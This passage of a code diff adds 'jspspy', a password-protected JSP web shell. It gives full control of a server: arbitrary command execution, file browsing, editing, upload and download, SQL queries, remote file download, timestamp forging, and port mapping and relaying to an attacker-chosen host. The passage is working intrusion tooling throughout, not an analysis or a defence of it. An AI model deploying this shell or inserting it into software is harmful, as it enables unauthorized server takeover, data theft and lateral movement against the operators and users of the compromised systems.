          "); + if (Util.isEmpty(sql)) { + String type = request.getParameter("type"); + if (Util.isEmpty(type) || type.equals("switch")) { + ResultSet tbs = meta.getTables(null,null,null,null); + out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true)); + tbs.close(); + } else if (type.equals("struct")) { + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + ResultSet t = meta.getColumns(null,null,tb,null); + out.println(Table.rs2Table(t,"",false)); + t.close(); + } + } + } catch (Exception e) { + JSession.setAttribute(MSG,"Some Error Occurred. Please Check Out the StackTrace Follow."+BACK_HREF); + throw e; + } + } + } + private static class ExecuteSQLInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String sql = request.getParameter("sql"); + String db = request.getParameter("selectDb"); + Object dbo = JSession.getAttribute(DBO); + if (!Util.isEmpty(sql)) { + if (dbo == null || !((DBOperator)dbo).isValid()) { + ((Invoker)ins.get("vConn")).invoke(request,response,JSession); + return; + } else { + ((Invoker)ins.get("dbc")).invoke(request,response,JSession); + Object obj = ((DBOperator)dbo).execute(sql); + if (obj instanceof ResultSet) { + ResultSet rs = (ResultSet)obj; + ResultSetMetaData meta = rs.getMetaData(); + int colCount = meta.getColumnCount(); + out.println("Query#0 : "+Util.htmlEncode(sql)+"

          "); + out.println(""); + for (int i=1;i<=colCount;i++) { + out.println(""); + } + out.println(""); + Table tb = new Table(); + while(rs.next()) { + Row r = new Row(); + for (int i = 1;i<=colCount;i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + r.addColumn(new Column(v)); + } + tb.addRow(r); + } + out.println(tb.toString()); + out.println("
          "+meta.getColumnName(i)+"
          "+meta.getColumnTypeName(i)+"

          "); + rs.close(); + ((DBOperator)dbo).closeStmt(); + } else { + out.println("affected rows : "+obj+"

          "); + } + } + } else { + ((Invoker)ins.get("dbc")).invoke(request,response,JSession); + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class VLoginInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println("jspspy
          "+ + ""+ + "

          Password: "+ + " "+ + " "+ + " "+ + "
          "+ + "

          "+ + "
          CY... I Love You. I Do! by n1nty 2010/8/18"); + } catch (Exception e) { + + throw e ; + } + } + } + private static class LoginInvoker extends DefaultInvoker{ + public boolean doBefore() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String inputPw = request.getParameter("pw"); + if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { + ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); + return; + } else { + JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); + response.sendRedirect(SHELL_NAME); + return; + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class MyComparator implements Comparator{ + public int compare(Object obj1,Object obj2) { + try { + if (obj1 != null && obj2 != null) { + File f1 = (File)obj1; + File f2 = (File)obj2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + return f1.getName().compareTo(f2.getName()); + } else { + return -1; + } + } else { + if (f2.isDirectory()) { + return 1; + } else { + return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase()); + } + } + } + return 0; + } catch (Exception e) { + return 0; + } + } + } + private static class FileListInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { + try { + String path2View = null; + PrintWriter out = response.getWriter(); + String path = request.getParameter("folder"); + String outEntry = request.getParameter("outentry"); + if (!Util.isEmpty(outEntry) && outEntry.equals("true")) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + } + Object enter = JSession.getAttribute(ENTER); + File file = null; + if (!Util.isEmpty(enter)) { + if (Util.isEmpty(path)) { + if (JSession.getAttribute(ENTER_CURRENT_DIR) == null) + path = "/"; + else + path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR)); + } + file = new EnterFile(path); + ((EnterFile)file).setZf((String)enter); + JSession.setAttribute(ENTER_CURRENT_DIR,path); + } else { + if (Util.isEmpty(path)) + path = JSession.getAttribute(CURRENT_DIR).toString(); + JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); + file = new File(path); + } + path2View = Util.convertPath(path); + if (!file.exists()) { + throw new Exception(path+"Dont Exists !"); + } + File[] list = file.listFiles(); + Arrays.sort(list,new MyComparator()); + out.println("
          "); + String cr = null; + try { + cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); + }catch(Exception e) { + cr = "/"; + } + File currentRoot = new File(cr); + out.println("

          File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

          "); + out.println("
          "+ + ""+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
          Current Directory
          "+ + "
          "); + out.println(""+ + ""+ + ""+ + ""+ + " "+ + " "+ + " "+ + " "+ + " "+ + ""); + if (file.getParent() != null) { + out.println(""+ + ""+ + ""+ + ""); + } + int dircount = 0; + int filecount = 0; + for (int i = 0;i"+ + ""+ + ""+ + ""+ + ""+ + ""+ + ""); + } else { + filecount++; + out.println(""+ + ""+ + ""+ + ""+ + ""+ + ""+ + ""); + } + } + out.println(""+ + " "+ + " "+ + "
          "+ + "
          "+ + "Web Root"+ + " | Shell Directory"+ + " | New Directory | New File"+ + " | "); + File[] roots = file.listRoots(); + for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); + if (i != roots.length -1) { + out.println("|"); + } + } + out.println("
           NameLast ModifiedSizeRead/Write/Execute 
          =Goto Parent
          0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow"); + if (enter != null) + out.println(" "); + else + out.println("Del | Move | Pack"); + out.println("
          "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ + ""+f.canRead()+" / "+f.canWrite()+" / unknow "+ + "Edit | "+ + "Down | "+ + "Copy"); + if (enter == null ) { + out.println(" | Move | "+ + "Property | "+ + "Enter"); + if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) { + out.println(" | UnPack"); + } else if (f.getName().endsWith(".rar")) { + out.println(" | UnPack"); + } else { + out.println(" | Pack"); + } + } + out.println("
           "); + if (enter != null) + out.println("Pack Selected - Delete Selected"); + else + out.println("Pack Selected - Delete Selected"); + out.println(""+dircount+" directories / "+filecount+" files
          "); + out.println("
          "); + if (file instanceof EnterFile) + ((EnterFile)file).close(); + } catch (ZipException e) { + JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit."); + throw e; + } catch (Exception e) { + JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF); + throw e; + } + } + } + private static class LogoutInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public boolean doAfter() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + Object dbo = JSession.getAttribute(DBO); + if (dbo != null) + ((DBOperator)dbo).close(); + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket)obj; + s.close(); + } + Object online = JSession.getAttribute(SHELL_ONLINE); + if (online != null) + ((OnLineProcess)online).stop(); + JSession.invalidate(); + ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); + } catch (ClassCastException e) { + JSession.invalidate(); + ((Invoker)ins.get("vLogin")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class UploadInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public boolean doAfter() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + UploadBean fileBean = new UploadBean(); + response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); + fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); + fileBean.parseRequest(request); + JSession.setAttribute(MSG,"Upload File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class CopyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String src = request.getParameter("src"); + String to = request.getParameter("to"); + InputStream in = null; + Object enter = JSession.getAttribute(ENTER); + if (enter == null) + in = new FileInputStream(new File(src)); + else { + ZipFile zf = new ZipFile((String)enter); + ZipEntry entry = zf.getEntry(src); + in = zf.getInputStream(entry); + } + BufferedInputStream input = new BufferedInputStream(in); + BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); + byte[] d = new byte[1024]; + int len = input.read(d); + while(len != -1) { + output.write(d,0,len); + len = input.read(d); + } + output.close(); + input.close(); + JSession.setAttribute(MSG,"Copy File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class BottomInvoker extends DefaultInvoker { + public boolean doBefore() {return false;} + public boolean doAfter() {return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + response.getWriter().println("
          Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VCreateFileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + File f = new File(path); + if (!f.isAbsolute()) { + String oldPath = path; + path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path+="/"; + path+=oldPath; + f = new File(path); + f.createNewFile(); + } else { + f.createNewFile(); + } + out.println("
          "+ + "
          "+ + "

          Create / Edit File »

          "+ + ""+ + "

          Current File (import new file name and new file)
          "+ + "

          "+ + "

          File Content

          "+ + "

          "+ + "
          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VEditInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String charset = request.getParameter("charset"); + Object enter = JSession.getAttribute(ENTER); + InputStream input = null; + if (enter != null) { + ZipFile zf = new ZipFile((String)enter); + ZipEntry entry = new ZipEntry(path); + input = zf.getInputStream(entry); + } else { + File f = new File(path); + if (!f.exists()) + return; + input = new FileInputStream(path); + } + + BufferedReader reader = null; + if (Util.isEmpty(charset) || charset.equals("ANSI")) + reader = new BufferedReader(new InputStreamReader(input)); + else + reader = new BufferedReader(new InputStreamReader(input,charset)); + StringBuffer content = new StringBuffer(); + String s = reader.readLine(); + while (s != null) { + content.append(s+"\r\n"); + s = reader.readLine(); + } + reader.close(); + out.println("
          "+ + "
          "+ + "

          Create / Edit File »

          "+ + ""+ + "

          Current File (import new file name and new file)
          "+ + "

          "+ + "

          File Content

          "+ + "

          "); + if (enter != null) + out.println(""); + else + out.println(""); + out.println("

          "+ + "
          "+ + "
          "); + + } catch (Exception e) { + + throw e ; + } + } + } + private static class CreateFileInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String path = request.getParameter("filepath"); + String content = request.getParameter("filecontent"); + String charset = request.getParameter("charset"); + BufferedWriter outs = null; + if (charset.equals("ANSI")) + outs = new BufferedWriter(new FileWriter(new File(path))); + else + outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset)); + outs.write(content,0,content.length()); + outs.close(); + JSession.setAttribute(MSG,"Save File "+(new File(path)).getName()+" With "+charset+" Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class VEditPropertyInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String filepath = request.getParameter("filepath"); + File f = new File(filepath); + if (!f.exists()) + return; + String read = f.canRead() ? "checked=\"checked\"" : ""; + String write = f.canWrite() ? "checked=\"checked\"" : ""; + Calendar cal = Calendar.getInstance(); + cal.setTimeInMillis(f.lastModified()); + + out.println("
          "+ + "
          "+ + "

          Set File Property »

          "+ + "

          Current File (FullPath)

          "+ + " "+ + "

          "+ + " Read "+ + " Write "+ + "

          "+ + "

          Instead »"+ + "year:"+ + ""+ + "month:"+ + ""+ + "day:"+ + ""+ + ""+ + "hour:"+ + ""+ + "minute:"+ + ""+ + "second:"+ + ""+ + "

          "+ + "

          "+ + "
          "+ + "
          "); + } catch (Exception e) { + throw e ; + } + } + } + private static class EditPropertyInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String f = request.getParameter("file"); + File file = new File(f); + if (!file.exists()) + return; + + String year = request.getParameter("year"); + String month = request.getParameter("month"); + String date = request.getParameter("date"); + String hour = request.getParameter("hour"); + String minute = request.getParameter("minute"); + String second = request.getParameter("second"); + + Calendar cal = Calendar.getInstance(); + cal.set(Calendar.YEAR,Integer.parseInt(year)); + cal.set(Calendar.MONTH,Integer.parseInt(month)-1); + cal.set(Calendar.DATE,Integer.parseInt(date)); + cal.set(Calendar.HOUR,Integer.parseInt(hour)); + cal.set(Calendar.MINUTE,Integer.parseInt(minute)); + cal.set(Calendar.SECOND,Integer.parseInt(second)); + if(file.setLastModified(cal.getTimeInMillis())){ + JSession.setAttribute(MSG,"Reset File Property Success!"); + } else { + JSession.setAttribute(MSG,"Reset File Property Failed!"); + } + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + //VShell + private static class VsInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String cmd = request.getParameter("command"); + String program = request.getParameter("program"); + if (cmd == null) { + if (ISLINUX) + cmd = "id"; + else + cmd = "cmd.exe /c set"; + } + if (program == null) + program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; + if (JSession.getAttribute(MSG)!=null) { + Util.outMsg(out,JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + out.println(""+ + "
          "+ + "
          "+ + "

          Execute Program »

          "+ + "

          "+ + ""+ + ""+ + "Parameter
          "+ + ""+ + "

          "+ + "
          "+ + "
          "+ + "

          Execute Shell »

          "+ + "

          "+ + ""+ + ""+ + "Parameter
          "+ + ""+ + "

          "+ + "
          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class ShellInvoker extends DefaultInvoker{ + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (type.equals("command")) { + ((Invoker)ins.get("vs")).invoke(request,response,JSession); + out.println("

          "); + out.println("
          ");
          +						String command = request.getParameter("command");
          +						if (!Util.isEmpty(command)) {
          +							Process pro = Runtime.getRuntime().exec(command);
          +							BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
          +							String s = reader.readLine();
          +							while (s != null) {
          +								out.println(Util.htmlEncode(Util.getStr(s)));
          +								s = reader.readLine();
          +							}
          +							reader.close();
          +							reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
          +							s = reader.readLine();
          +							while (s != null) {
          +								out.println(Util.htmlEncode(Util.getStr(s)));
          +								s = reader.readLine();
          +							}
          +							reader.close();
          +							out.println("
          "); + } + } else { + String program = request.getParameter("program"); + if (!Util.isEmpty(program)) { + Process pro = Runtime.getRuntime().exec(program); + JSession.setAttribute(MSG,"Program Has Run Success!"); + ((Invoker)ins.get("vs")).invoke(request,response,JSession); + } + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class DownInvoker extends DefaultInvoker{ + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String path = request.getParameter("path"); + if (Util.isEmpty(path)) + return; + InputStream i = null; + Object enter = JSession.getAttribute(ENTER); + String fileName = null; + if (enter == null) { + File f = new File(path); + if (!f.exists()) + return; + fileName = f.getName(); + i = new FileInputStream(f); + } else { + ZipFile zf = new ZipFile((String)enter); + ZipEntry entry = new ZipEntry(path); + fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1); + i = zf.getInputStream(entry); + } + response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET)); + BufferedInputStream input = new BufferedInputStream(i); + BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data,0,len); + len = input.read(data); + } + input.close(); + output.close(); + } catch (Exception e) { + + throw e ; + } + } + } + //VDown + private static class VdInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String savepath = request.getParameter("savepath"); + String url = request.getParameter("url"); + if (Util.isEmpty(url)) + url = "http://www.forjj.com/"; + if (Util.isEmpty(savepath)) { + savepath = JSession.getAttribute(CURRENT_DIR).toString(); + } + if (!Util.isEmpty(JSession.getAttribute("done"))) { + Util.outMsg(out,"Download Remote File Success!"); + JSession.removeAttribute("done"); + } + out.println("
          "+ + "
          "+ + "

          Remote File DownLoad »

          "+ + "

          "+ + ""+ + "

          File   URL: "+ + "

          "+ + "

          Save Path: "+ + "

          "+ + ""+ + "

          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class DownRemoteInvoker extends DefaultInvoker { + public boolean doBefore(){return true;} + public boolean doAfter(){return true;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String downFileUrl = request.getParameter("url"); + String savePath = request.getParameter("savepath"); + if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) + return; + URL downUrl = new URL(downFileUrl); + URLConnection conn = downUrl.openConnection(); + + File tempF = new File(savePath); + File saveF = tempF; + if (tempF.isDirectory()) { + String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1); + saveF = new File(tempF,fName); + } + BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); + BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF)); + byte[] data = new byte[1024]; + int len = in.read(data); + while (len != -1) { + out.write(data,0,len); + len = in.read(data); + } + in.close(); + out.close(); + JSession.setAttribute("done","d"); + ((Invoker)ins.get("vd")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class IndexInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + ((Invoker)ins.get("filelist")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class MkDirInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String name = request.getParameter("name"); + File f = new File(name); + if (!f.isAbsolute()) { + String path = JSession.getAttribute(CURRENT_DIR).toString(); + if (!path.endsWith("/")) + path += "/"; + path += name; + f = new File(path); + } + f.mkdirs(); + JSession.setAttribute(MSG,"Make Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class MoveInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String src = request.getParameter("src"); + String target = request.getParameter("to"); + if (!Util.isEmpty(target) && !Util.isEmpty(src)) { + File file = new File(src); + if(file.renameTo(new File(target))) { + JSession.setAttribute(MSG,"Move File Success!"); + } else { + String msg = "Move File Failed!"; + if (file.isDirectory()) { + msg += "The Move Will Failed When The Directory Is Not Empty."; + } + JSession.setAttribute(MSG,msg); + } + response.sendRedirect(SHELL_NAME); + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class RemoveDirInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String dir = request.getParameter("dir"); + File file = new File(dir); + if (file.exists()) { + deleteFile(file); + deleteDir(file); + } + + JSession.setAttribute(MSG,"Remove Directory Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + public void deleteFile(File f) { + if (f.isFile()) { + f.delete(); + }else { + File[] list = f.listFiles(); + for (int i = 0;i"+ + ""+ + ""+ + ""+ + " "+ + " "+ + " "+ + "

          Pack Configuration >>

          "+ + "
          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
          Packed Dir
          Save To
          Ext Filter"+ + " no Blacklist Whitelist"+ + "
          "+ + "
          Filesize Filter(KB) "+ + " no greaterthanlessthan
          Exclude Dir
          "+ + " "+ + "
          "+ + "
          " + ); + } catch (Exception e) { + + throw e; + } + } + } + private static class PackInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + private boolean config = false; + private String extFilter = "blacklist"; + private String[] fileExts = null; + private String sizeFilter = "no"; + private int filesize = 0; + private String[] exclude = null; + private String packFile = null; + private void reset(){ + this.config = false; + this.extFilter = "blacklist"; + this.fileExts = null; + this.sizeFilter = "no"; + this.filesize = 0; + this.exclude = null; + this.packFile = null; + } + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String config = request.getParameter("config"); + if (!Util.isEmpty(config) && config.equals("true")) { + this.config = true; + this.extFilter = request.getParameter("extfilter"); + this.fileExts = request.getParameter("fileext").split(","); + this.sizeFilter = request.getParameter("sizefilter"); + this.filesize = Integer.parseInt(request.getParameter("filesize")); + this.exclude = request.getParameter("exclude").split(","); + } + String packedFile = request.getParameter("packedfile"); + if (Util.isEmpty(packedFile)) + return; + this.packFile = packedFile; + String saveFileName = request.getParameter("savefilename"); + File saveF = null; + if (this.config) + saveF = new File(saveFileName); + else + saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); + if (saveF.exists()) { + JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); + response.sendRedirect(SHELL_NAME); + return; + } + File pF = new File(packedFile); + ZipOutputStream zout = null; + String base = ""; + if (pF.isDirectory()) { + if (pF.listFiles().length == 0) { + JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty ."); + response.sendRedirect(SHELL_NAME); + this.reset(); + return; + } + zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); + zipDir(pF,base,zout); + } else { + zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); + zipFile(pF,base,zout); + } + zout.close(); + this.reset(); + JSession.setAttribute(MSG,"Pack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + throw e; + } + } + public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { + if (f.isDirectory()) { + if (this.config) { + String curName = f.getAbsolutePath().replace('\\','/'); + curName = curName.replaceAll("\\Q"+this.packFile+"\\E",""); + if (this.exclude != null) { + for (int i = 0;i filesize) + return; + } + } + } + ZipEntry entry = new ZipEntry(base+f.getName()); + zout.putNextEntry(entry); + FileInputStream fInput = new FileInputStream(f); + int len = 0; + byte[] buf = new byte[1024]; + while ((len = fInput.read(buf)) != -1) { + zout.write(buf, 0, len); + zout.flush(); + } + fInput.close(); + } + } + private static class UnPackInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String savepath = request.getParameter("savepath"); + String zipfile = request.getParameter("zipfile"); + if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) + return; + File save = new File(savepath); + save.mkdirs(); + ZipFile file = new ZipFile(new File(zipfile)); + Enumeration e = file.entries(); + while (e.hasMoreElements()) { + ZipEntry en = (ZipEntry) e.nextElement(); + String entryPath = en.getName(); + int index = entryPath.lastIndexOf("/"); + if (index != -1) + entryPath = entryPath.substring(0,index); + File absEntryFile = new File(save,entryPath); + if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) + absEntryFile.mkdirs(); + BufferedOutputStream output = null; + BufferedInputStream input = null; + try { + output = new BufferedOutputStream( + new FileOutputStream(new File(save,en.getName()))); + input = new BufferedInputStream( + file.getInputStream(en)); + byte[] b = new byte[1024]; + int len = input.read(b); + while (len != -1) { + output.write(b, 0, len); + len = input.read(b); + } + } catch (Exception ex) { + } finally { + try { + if (output != null) + output.close(); + if (input != null) + input.close(); + } catch (Exception ex1) { + } + } + } + file.close(); + JSession.setAttribute(MSG,"UnPack File Success!"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + //VMapPort + private static class VmpInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object localIP = JSession.getAttribute("localIP"); + Object localPort = JSession.getAttribute("localPort"); + Object remoteIP = JSession.getAttribute("remoteIP"); + Object remotePort = JSession.getAttribute("remotePort"); + Object done = JSession.getAttribute("done"); + + JSession.removeAttribute("localIP"); + JSession.removeAttribute("localPort"); + JSession.removeAttribute("remoteIP"); + JSession.removeAttribute("remotePort"); + JSession.removeAttribute("done"); + + if (Util.isEmpty(localIP)) + localIP = InetAddress.getLocalHost().getHostAddress(); + if (Util.isEmpty(localPort)) + localPort = "3389"; + if (Util.isEmpty(remoteIP)) + remoteIP = "www.forjj.com"; + if (Util.isEmpty(remotePort)) + remotePort = "80"; + if (!Util.isEmpty(done)) + Util.outMsg(out,done.toString()); + + out.println("
          "+ + ""+ + " "+ + " "+ + " "+ + ""+ + "

          PortMap >>

          "+ + "
          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "

          Local Ip :"+ + " "+ + "
          Local Port :"+ + " Remote Ip :"+ + " Remote Port :"+ + "

          "+ + " "+ + " "+ + "
          "+ + "
          "+ + "
          "+ + "
          "); + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + if (Util.isEmpty(targetIP)) + targetIP = "127.0.0.1"; + if (Util.isEmpty(targetPort)) + targetPort = "3389"; + if (Util.isEmpty(yourIP)) + yourIP = request.getRemoteAddr(); + if (Util.isEmpty(yourPort)) + yourPort = "53"; + out.println("
          "+ + ""+ + " "+ + " "+ + " "+ + ""+ + "

          Port Back >>

          "+ + "
          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "

          Target Ip :"+ + " "+ + "
          Target Port :"+ + " Your Ip :"+ + " Your Port :"+ + "

          "+ + " "+ + "
          "+ + "
          "+ + "
          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + //StopMapPort + private static class SmpInvoker extends DefaultInvoker { + public boolean doAfter(){return true;} + public boolean doBefore(){return true;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + Object obj = JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); + server.close(); + } + JSession.setAttribute("done","Stop Success!"); + ((Invoker)ins.get("vmp")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + //PortBack + private static class PortBackInvoker extends DefaultInvoker { + public boolean doAfter(){return true;} + public boolean doBefore(){return true;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String targetIP = request.getParameter("targetIP"); + String targetPort = request.getParameter("targetPort"); + String yourIP = request.getParameter("yourIP"); + String yourPort = request.getParameter("yourPort"); + Socket yourS = new Socket(); + yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort))); + Socket targetS = new Socket(); + targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort))); + StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream())); + StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream())); + JSession.setAttribute("done","Port Back Success !"); + ((Invoker)ins.get("vmp")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + private static class MapPortInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String localIP = request.getParameter("localIP"); + String localPort = request.getParameter("localPort"); + final String remoteIP = request.getParameter("remoteIP"); + final String remotePort = request.getParameter("remotePort"); + if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) + return; + Object obj = 